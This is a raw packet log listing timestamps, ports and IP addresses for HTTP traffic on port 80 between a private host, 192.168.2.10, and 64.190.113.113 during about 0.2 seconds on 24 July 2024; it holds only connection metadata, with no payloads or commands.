Jul 24, 2024 19:56:25.124794006 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124805927 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124829054 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.124898911 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.124907970 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124999046 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.125927925 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.125941038 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.125952959 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.125965118 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.125977993 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.126008034 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.126030922 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.126627922 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.126641989 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.126655102 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.126667976 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.126678944 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.126693010 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.126703978 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.126703978 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.126755953 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.127762079 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.127774954 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.127785921 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.127799034 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.127810001 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.127871990 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.127871990 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.127871990 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.128959894 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.128976107 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.128988028 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.128999949 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129014969 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129028082 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129080057 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.129080057 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.129080057 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.129534006 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129547119 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129559040 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129570961 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129584074 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129595995 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129601955 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.129609108 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.129838943 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.130323887 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.130372047 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.130718946 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.130733013 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.130743980 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.130755901 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.130768061 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.130852938 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.130852938 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.131350994 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.131365061 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.131377935 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.131391048 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.131402016 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.131413937 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.131426096 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.131443977 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.131443977 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.131499052 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.131499052 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.132560968 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.132575035 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.132587910 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.132601023 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.132613897 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.132627010 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.132637978 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.132656097 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.132656097 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.132677078 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.133111954 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.133125067 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.133137941 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.133150101 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.133157015 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.133208990 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.133268118 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.133301973 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.133341074 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.134449959 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.134505033 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.134515047 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.134541988 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.134579897 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.134588003 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.134623051 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.134654045 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.134665012 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.134692907 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.134732008 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.135018110 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.135071039 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.135106087 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.135164022 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.135214090 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.135214090 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.136027098 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136039972 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136092901 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.136131048 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136143923 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136154890 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136168003 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136181116 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.136312008 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136326075 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.136837959 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136852026 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136864901 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136878014 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136881113 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.136890888 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136904955 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136910915 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.136917114 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136929989 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.136959076 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.136959076 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.184298992 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.208583117 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.208652020 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.208666086 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.208748102 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.208955050 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.208966970 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.208978891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209053040 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.209053040 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.209353924 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209364891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209377050 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209404945 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.209851027 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209861994 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209876060 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209888935 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209901094 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209913015 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.209923983 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.209923983 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.209966898 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.211077929 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211216927 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.211271048 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211282969 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211292982 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211303949 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211319923 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211334944 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.211391926 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.211571932 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211584091 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211595058 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211606026 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211611032 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.211618900 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211631060 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211642027 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.211654902 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.211699963 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.211709023 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.212601900 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.212786913 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.212799072 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.212925911 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.212934017 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.212945938 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.212955952 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.212970018 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.213023901 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.213023901 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.214261055 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.214272976 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.214283943 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.214412928 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.214413881 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.214618921 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.214629889 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.214636087 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.214787960 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.216093063 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.216109991 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.216120005 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.216130972 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.216141939 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.216152906 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.216157913 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.216169119 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.216170073 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.216170073 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.216218948 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.216218948 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.217113018 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.217123985 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.217134953 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.217232943 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.217232943 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.217298031 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.217310905 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.217322111 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.217331886 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.217359066 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.217456102 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.218138933 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.218151093 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.218162060 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.218172073 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.218183041 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.218194008 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.218204021 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.218209982 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.218215942 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.218242884 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.218278885 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.219724894 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.219738007 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.219748020 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.219758987 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.219769001 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.219782114 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.219788074 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.219790936 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.219799995 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.219876051 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.219876051 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.221049070 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221240044 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221251965 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221261978 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221273899 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221285105 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221297026 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221306086 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.221306086 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.221671104 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.221844912 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221857071 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.221868038 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.222007990 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.222007990 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.222009897 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.222021103 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.222032070 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.222043037 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.222054958 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.222085953 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.222085953 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.223256111 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.223268032 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.223278999 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.223292112 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.223309994 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.223320961 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.223330975 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.223330975 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.223335028 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.223340988 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.223354101 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.223381042 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.224766970 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.224786043 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.224796057 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.224807978 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.224818945 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.224829912 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.224831104 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.224842072 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.224854946 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.224879026 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.224917889 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.225416899 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.225429058 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.225441933 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.225454092 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.225465059 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.225475073 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.225477934 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.225492001 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.225584984 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.302109003 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.302143097 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.302155018 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.302320004 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.302520990 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.302531958 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.302541971 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.302555084 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.303014994 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.303014994 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.303247929 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.303258896 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.303292036 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.303304911 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.303316116 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.303327084 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.303354979 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.303354979 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.303354979 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.304080009 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.304091930 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.304101944 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.304114103 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.304124117 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.304136038 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.304146051 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.304164886 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.304164886 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.304164886 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.304214954 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.304981947 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.304994106 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.305005074 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.305016041 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.305027008 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.305037975 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.305048943 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.305104971 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.305104971 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.305104971 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.306056023 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.306068897 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.306078911 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.306090117 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.306101084 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.306113005 CEST	80	49733	64.190.113.113	192.168.2.10
